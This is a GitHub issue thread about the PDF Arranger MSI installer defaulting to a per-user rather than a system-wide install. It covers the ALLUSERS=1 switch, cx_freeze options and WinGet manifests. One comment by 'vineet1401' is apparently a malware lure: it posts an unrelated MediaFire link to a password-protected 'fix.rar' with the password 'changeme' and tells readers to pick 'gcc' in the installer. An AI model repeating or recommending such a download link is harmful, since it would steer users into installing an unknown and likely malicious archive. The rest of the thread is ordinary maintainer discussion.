### ISSUE TITLE
MSI Install defaults User install, instead of System Install

### ISSUE THREAD

**Issue by GraphicHealer** [pdfarranger/pdfarranger#1114]
Describe the bug
----------------
When installing PDF Arranger onto a PC, it will default to installing for only the current user, instead of System-Wide. I am a Systems Administrator, and we deploy PDF Arranger to several of our departments where I work.

The main issue we have right now is we are having to manually tell PDF Arranger to install to `C:\Program Files\PDFArranger` using the `TARGETDIR` value in msiexec. All of our other packages just automatically install to `Program Files`, with no hassle.

We are also having to run a separate script to manually create the Desktop and Start Menu icons for PDF Arranger, because it will again default to creating the icon on the _user_ level instead of the _system_ level.

To Reproduce
------------

1. Download the latest PDF Arranger installer
2. Run the MSI

PDF Arranger will now be installed to `C:\Users\<USER>\AppData\Local\PDFArranger`, and a Desktop Icon will be created at `C:\Users\<USER>\Desktop\PDF Arranger.lnk`

Expected behavior
-----------------
PDF Arranger should install by default to `C:\Program Files\PDFArranger` (Or `C:\Program Files (x86)\PDFArranger`, depending on the Architecture), and should create Shortcuts in both `C:\Users\Public\Desktop` and `C:\ProgramData\Microsoft\Windows\Start Menu` to account for both the Desktop and Start Menu for all users. This would allow for MUCH easier management of the PDF Arranger application.

An option could also be added that can specify User-Level or System-Level in the Installation GUI, allowing the choice.
For example, the Android SDK Setup Wizard:
![image](https://github.com/user-attachments/assets/c40c90cd-2fd0-4734-83b9-e918db171c9b)

In general, MSI Installers should default to System-Level install when executed, especially if run in an `Administrators` or `NT AUTHORITY\SYSTEM` context.

System and Versions
-------------------

- v1.11.0, v1.10.1, v1.10.0, v1.9.2, etc.
- Windows 10/11
- Various Desktops and Laptops

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by locness3** [comment]
It looks like [cx_freeze allows to choose a system-wide install when creating the installer](https://cx-freeze.readthedocs.io/en/stable/bdist_msi.html#cmdoption-arg-all_users), but not to allow selecting either during installation.

**Comment by GraphicHealer** [comment]
The majority of people are going to be administrators on their own computers anyways, so defaulting the system probably wouldn't break anything.

**Comment by dreua** [comment]
Could you create a PR so we can run the ci and you can test whether that works for this use case? I'm thinking maybe we can just build two installers, keep the current for the users without admin access (also to make it easier for current user to update) and one for organizations (I would call it something like that so the regular users hopefully don't choose it).

For a first test you don't need to duplicate or rename anything though, keep it simple and iterate ;)

I have a feeling that there will be users who don't have admin access or forgot their password and would complain if we took away their installer. Also having installed multiple versions as user and system wide will probably not make stuff any easier.

**Comment by GraphicHealer** [comment]
@dreua, I had another thought, how would this affect WinGet installations? We use this for some of our deployments, is there a way with WinGet to specify a different installer package for `--scope=user` and `--scope=machine` in the definitions file that PDFArranger maintains in the WinGet Repo?

**Comment by GraphicHealer** [comment]
Oh! Well nevermind about this bug, it turns out y'all had already implemented the `ALLUSERS=1` switch! so all I have to do now is ask for an update on the WinGet Source Repo, and implement the `ALLUSERS=1` flag in the manifest! Thanks for the help!

**Comment by GraphicHealer** [comment]
Actually, I found a perfect representation of what is actually happening on WinGet's end, causing this to be an issue with PDFArranger:

https://github.com/microsoft/winget-cli/issues/3969

**Comment by dreua** [comment]
Alright, I'm glad that you found a that, I wasn't aware we supported any `ALLUSERS` flag, that is probably included in cx freeze or some other library we use to build the installer. (I haven't really worked on that part of PDF Arranger.) For future reference, there is Another repo which could also be relevant for stuff like this: https://github.com/pdfarranger/pdfarranger-docker-ci

It would be nice if you dropped a link here if you are going to follow up on this with an issue at Winget.

**Comment by GraphicHealer** [comment]
https://github.com/microsoft/winget-pkgs/pull/172148

Already did a PR, and it was approved! Still got to fix all the other versions, didn't realize I had to update a manifest version...

**Comment by GraphicHealer** [comment]
Also, the way I figured out that `ALLUSERS=1` was a thing in PDF arranger was because there is no mention of a direct install directory within the python script that builds the MSI. I then knew it had to be using some sort of default for windows, so I looked up the build tool you were using and it mentioned the `ALLUSERS=1` flag.

**Comment by GraphicHealer** [comment]
One last thought for you, maybe it would be possible to add a section to your Build Action to automatically create the WinGet Manifest and push a PR to the /microsoft/winget-pkgs repo?

**Comment by dreua** [comment]
If someone is willing to create and maintain such a script, that would be fine with me. I'd appreciate a new issue or discussion if you want to pursue this further in order to keep things organized here.
